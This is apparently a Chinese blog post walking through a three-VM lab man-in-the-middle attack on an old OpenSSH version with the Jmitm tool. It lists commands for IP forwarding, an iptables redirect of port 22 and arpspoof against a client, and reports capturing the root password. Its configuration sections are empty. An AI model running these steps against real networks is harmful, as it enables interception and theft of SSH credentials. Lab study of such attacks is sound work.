利用Jmitm对OpenSSH2.0版本进行中间人攻击中间人攻击

        利用Jmitm对OpenSSH2.0版本进行中间人攻击中间人攻击

准备三台linux虚拟机,除了中间人机器(10.10.19.136)外的另外两台虚拟机的openSSH需要重新下载openSSH5.3此类较早前的版本源码并编译,安装成功后测试openSSH服务是否开启成功。

CenOS查看指令systemctl status service

在中间人机器(10.10.19.136)上下载jmitm软件并解压:

wgethttp://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz  #下载

tar xfjmitm2-0.1.0.tar.gz   #解压

对该工具进行配置,编辑jmitm软件中的server.xml(/jmitm2-0.1.0/conf/server.xml)配置文件:


对该工具进行配置,编辑jmitm软件中的runm.sh(/jmitm2-0.1.0/bin/runm.sh)配置文件:


运行/jmitm2-0.1.0/bin目录下的runm.sh程序,开始监听连接:

./runm.sh

客户端10.10.19.189    服务端    10.10.19.178   中间人 10.10.19.136

依次运行以下命令:

echo 1 >

/proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING

-p tcp --dport 22 -j REDIRECT

iptables -A FORWARD

-j ACCEPT

arpspoof -i eth0 -t 10.10.19.189(客户端IP)10.10.19.178(服务端IP)


在ssh客户端10.10.19.189登录ssh服务端10.10.19.178并输入密码*********

查看运行的程序runm.sh所输出的内容中,发现成功捕获到用户名(root)/密码(*********):

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 目前能ping通的IP:216.58.193.51 59.18.44.245 59.18.44.53 59.18....
    StevenZack阅读 6,820评论 0 0
  • 第 2 章 SHELL 基础知识2.1 shell脚本我们在上面简单介绍了一下什么是shell脚本,现在我们来进一...
    LiWei_9e4b阅读 5,472评论 0 0
  • 《m就是凶手》。这是一部1931年上映的老片子。电影史上最伟大的犯罪电影之一、德国表现主义大师弗烈兹·朗的第一部有...
    清水无香LY阅读 1,549评论 0 0
  • 每天早上,叫醒我的不是梦想,也不是闹钟,而是屋内叮叮当当的声音,发出声音的不是别人,正是她——我的母...
    贾馨婷阅读 1,558评论 4 7

友情链接更多精彩内容